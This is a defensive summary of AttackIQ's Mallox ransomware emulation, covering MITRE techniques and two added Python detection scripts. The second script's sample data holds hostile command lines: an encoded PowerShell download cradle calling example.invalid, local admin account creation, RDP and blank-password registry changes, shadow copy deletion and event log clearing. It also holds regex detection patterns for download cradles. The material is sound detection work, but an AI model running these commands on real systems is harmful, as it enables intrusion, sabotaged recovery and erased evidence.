Mallox is a Ransomware-as-a-Service operation active since 2021 that primarily targets unsecured MS-SQL servers and delivers payloads via PowerShell. AttackIQ’s analysis provides an attack graph of Mallox’s TTPs, outlines its lifecycle from initial access to encryption, and offers mitigation strategies for defenders. #Mallox #TargetCompany #FARGO #Tohnichi #MSQL #PowerShell #AttackIQ #AttackGraph
Keypoints
- Mallox has operated under a Ransomware-as-a-Service (RaaS) model since June 2021.
- Targets unsecured MS-SQL servers using dictionary attacks for initial access.
- Utilizes PowerShell to download and execute the ransomware payload.
- Employs tools for network scanning and data exfiltration and is expanding via underground affiliate recruitment.
- AttackIQ released an attack graph to help validate security controls against Mallox’s TTPs.
- Key attack stages include initial access, execution, discovery, persistence, lateral movement, and encryption; defense recommendations emphasize layered defenses and continuous validation.
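Mallox's initial access is a dictionary attack against an exposed MS-SQL login, and SQL Server records every failed login as error 18456 in its ERRORLOG. The following is an added Python example, not material from the AttackIQ article: it parses constructed ERRORLOG lines and alerts on any client address that fails a threshold number of logins inside a sliding window. The addresses, login names and threshold values are assumptions to be tuned for a real environment.

```python
"""Spot a dictionary attack against an MS-SQL login in SQL Server ERRORLOG lines.

Added example, not from the AttackIQ article. The ERRORLOG excerpt below is
constructed in the format SQL Server uses for login failure 18456 (each failure
is a pair of lines; only the second carries the login name and client address);
the addresses, login names and thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_ERRORLOG = """\
2024-08-30 10:15:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:15:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-08-30 10:15:01.35 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:15:01.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-08-30 10:15:01.60 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:15:01.60 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-08-30 10:15:01.85 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:15:01.85 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-08-30 10:15:02.10 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:15:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-08-30 10:15:02.35 Logon       Error: 18456, Severity: 14, State: 5.
2024-08-30 10:15:02.35 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2024-08-30 10:20:00.00 Logon       Error: 18456, Severity: 14, State: 8.
2024-08-30 10:20:00.00 Logon       Login failed for user 'report_ro'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.12]
"""

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failures(errorlog: str):
    """Yield (timestamp, login, client) for every 'Login failed' line."""
    for line in errorlog.splitlines():
        m = LOGIN_FAILED.match(line)
        # The preceding "Error: 18456 ... State: N." line carries no client, so it is skipped.
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"), m["user"], m["client"]


def detect_dictionary_attacks(errorlog: str, threshold: int = 5,
                              window: timedelta = timedelta(seconds=60)):
    """Alert on any client that fails `threshold` logins inside a sliding `window`.

    Keying on the client address rather than the login catches the common case
    where one source hammers 'sa' and a few guessed account names.
    """
    by_client = defaultdict(list)
    for ts, user, client in parse_failures(errorlog):
        by_client[client].append((ts, user))
    alerts = []
    for client, attempts in by_client.items():
        attempts.sort()
        start = 0
        for end, (ts, _) in enumerate(attempts):
            while ts - attempts[start][0] > window:  # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append({
                    "client": client,
                    "failures": end - start + 1,
                    "logins": sorted({u for _, u in attempts[start:end + 1]}),
                    "first": attempts[start][0],
                    "last": ts,
                })
                break  # one alert per client; the SIEM can count the rest
    return alerts


if __name__ == "__main__":
    for a in detect_dictionary_attacks(SAMPLE_ERRORLOG):
        span = (a["last"] - a["first"]).total_seconds()
        print(f"{a['client']}: {a['failures']} failures in {span:.2f}s, logins tried {a['logins']}")
```

Run against the constructed sample, the 203.0.113.5 burst is reported after five failures in about one second while the single failure from 10.0.0.12 is ignored; an exposed instance that must stay reachable should still have the sa login disabled and a lockout or firewall rule in front of it, since a threshold alert only tells you the attack is under way.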
MITRE Techniques
- [T1105] Ingress Tool Transfer – Two scenarios deliver known malicious content, one downloading it into memory only and the other saving it to disk, so that network and endpoint controls are each tested on their ability to block the delivery.
- [T1059.001] PowerShell – This scenario encodes a user-defined PowerShell script as base64 and executes it with PowerShell's -EncodedCommand parameter (the parameter expects the script's UTF-16LE bytes, base64-encoded).
- [T1047] Windows Management Instrumentation – This scenario executes a binary by creating a process through Windows Management Instrumentation (WMI).
- [T1136.001] Create Account: Local Account – This scenario attempts to create a new local user with the net user command.
- [T1098] Account Manipulation – This scenario adds a local user to the local Administrators group and to the Remote Desktop Users group using the net localgroup command.
- [T1021.001] Remote Desktop Protocol – This scenario attempts to move laterally within the network over the Remote Desktop Protocol (RDP).
- [T1562.001] Impair Defenses: Disable or Modify Tools – The registry value HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections is set to 0, which enables inbound Remote Desktop connections to the system.
- [T1562] Impair Defenses: Disable Limit Blank Password Use via Registry – This scenario disables the Limit Blank Password Use setting by setting the existing HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse registry value to 0, which allows local accounts with blank passwords to be used for network logons rather than console logon only.
- [T1490] Inhibit System Recovery – This scenario executes the vssadmin.exe utility to delete a recent Volume Shadow Copy created by the assessment template.
- [T1497] Virtualization/Sandbox Evasion – This scenario calls the IsDebuggerPresent Windows API to detect a debugger attached to the current process (MITRE also catalogues debugger checks separately as T1622 Debugger Evasion).
- [T1082] System Information Discovery – This scenario executes the GetNativeSystemInfo native API call to retrieve information about the system.
- [T1016] System Network Configuration Discovery – This scenario executes route, ipconfig, nltest, net or arp commands to enumerate the available network configuration.
- [T1614] System Location Discovery – This scenario executes the GetLocaleInfoA Windows API to retrieve the user's default country locale code from the local computer.
- [T1048.003] Exfiltration Over Unencrypted Non-C2 Protocol – This scenario exfiltrates a pre-generated text file containing the output of a series of discovery commands a threat actor would run. The file is sent in an HTTP POST request to an AttackIQ-controlled test server.
- [T1486] Data Encrypted for Impact – This scenario performs the file encryption routines used by common ransomware families: files matching an extension list are identified and encrypted in place using similar encryption algorithms.
- [T1070.001] Indicator Removal: Clear Windows Event Logs – This scenario uses the wevtutil.exe binary to clear event logs from the system.
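The command lines these scenarios run are what an endpoint detection has to see. The Python below is an added example, not code from the AttackIQ article or its attack graph: it maps constructed process-creation command lines (the kind a Sysmon Event ID 1 or Security 4688 record carries) to the technique IDs listed above, decodes a -EncodedCommand payload (powershell.exe accepts any unambiguous prefix such as -e or -enc, and the value is base64 of UTF-16LE, so a detection that only looks for the full spelling or tries a UTF-8 decode misses it), and only raises a host when several distinct techniques stack up, so a lone ipconfig does not page anyone. The host names, account name, example.invalid URL and regex rules are assumptions, not indicators from the article.

```python
"""Map process-creation command lines to the Mallox TTPs listed above.

Added example, not code from the AttackIQ article or its attack graph. The
sample events are constructed to look like Sysmon Event ID 1 / Security 4688
command lines; host names, the account name, the URL and the regex rules are
assumptions, not indicators from the article.
"""
import base64
import binascii
import re

# Constructed download cradle, base64-encoded as UTF-16LE, which is the form
# powershell.exe expects for -EncodedCommand.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
ENCODED_CRADLE = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # (host, command line); constructed, not from the article
    ("SQL01", f"powershell.exe -nop -w hidden -enc {ENCODED_CRADLE}"),
    ("SQL01", "net user svc_backup P@ssw0rd123 /add"),
    ("SQL01", "net localgroup Administrators svc_backup /add"),
    ("SQL01", 'net localgroup "Remote Desktop Users" svc_backup /add'),
    ("SQL01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("SQL01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f'),
    ("SQL01", "vssadmin.exe delete shadows /all /quiet"),
    ("SQL01", "wevtutil.exe cl Security"),
    ("WS07", "ipconfig /all"),
    ("WS07", 'powershell.exe -NoProfile -Command "Get-Date"'),
]

# One regex per technique; order only affects the order of reported hits.
RULES = [
    ("T1136.001", re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    ("T1098", re.compile(r'\bnet1?(?:\.exe)?\s+localgroup\s+"?(?:administrators|remote desktop users)"?\s+\S+\s+/add\b', re.I)),
    ("T1562.001", re.compile(r"Terminal Server.*\bfDenyTSConnections\b.*/d\s+0\b", re.I)),
    ("T1562", re.compile(r"\bLsa\b.*\bLimitBlankPasswordUse\b.*/d\s+0\b", re.I)),
    ("T1490", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("T1070.001", re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\S+", re.I)),
    ("T1016", re.compile(r"^(?:ipconfig|arp|route|nltest)(?:\.exe)?\s", re.I)),
]
# Download cradles looked for inside a decoded -EncodedCommand payload.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bIEX\b|Invoke-Expression", re.I)
POWERSHELL_IMAGE = re.compile(r"^(?:.*\\)?(?:powershell|pwsh)(?:\.exe)?$", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the line runs PowerShell with -EncodedCommand, else None.

    powershell.exe accepts any unambiguous prefix of the parameter name (-e,
    -ec, -enc, ...), so the flag is matched as a prefix; the value is assumed
    to be the next whitespace-separated token.
    """
    tokens = cmdline.split()
    if not tokens or not POWERSHELL_IMAGE.match(tokens[0]):
        return None
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16le")
            except (binascii.Error, UnicodeDecodeError):
                return None  # not a well-formed encoded command
    return None


def match_techniques(cmdline: str):
    """Technique IDs from the list above that a single command line exhibits."""
    hits = [tid for tid, rx in RULES if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("T1059.001")
        if CRADLE.search(decoded):
            hits.append("T1105")  # the cradle stages the ingress tool transfer
    return hits


def triage(events, min_techniques: int = 3):
    """Group hits per host; a host with several distinct techniques is the chain, not noise."""
    per_host = {}
    for host, cmdline in events:
        entry = per_host.setdefault(host, {"techniques": [], "decoded": []})
        for tid in match_techniques(cmdline):
            if tid not in entry["techniques"]:
                entry["techniques"].append(tid)
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            entry["decoded"].append(decoded)
    return {h: e for h, e in per_host.items() if len(e["techniques"]) >= min_techniques}


if __name__ == "__main__":
    for host, entry in triage(SAMPLE_EVENTS).items():
        print(host, entry["techniques"])
        for script in entry["decoded"]:
            print("  decoded:", script)
```

On the constructed sample only SQL01 is reported, with eight technique IDs and the decoded cradle; WS07 shows a single T1016 hit and stays below the threshold. The registry rules match reg.exe only, so a real deployment would add the equivalent Set-ItemProperty forms and, for the PowerShell rule, also parse ScriptBlock logging (Event ID 4104), which records the script after decoding.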
Indicators of Compromise
- [IOC] None disclosed – No IPs, hashes, domains, or filenames are explicitly mentioned in the article.
Read more: https://www.attackiq.com/2024/08/30/emulating-mallox-ransomware/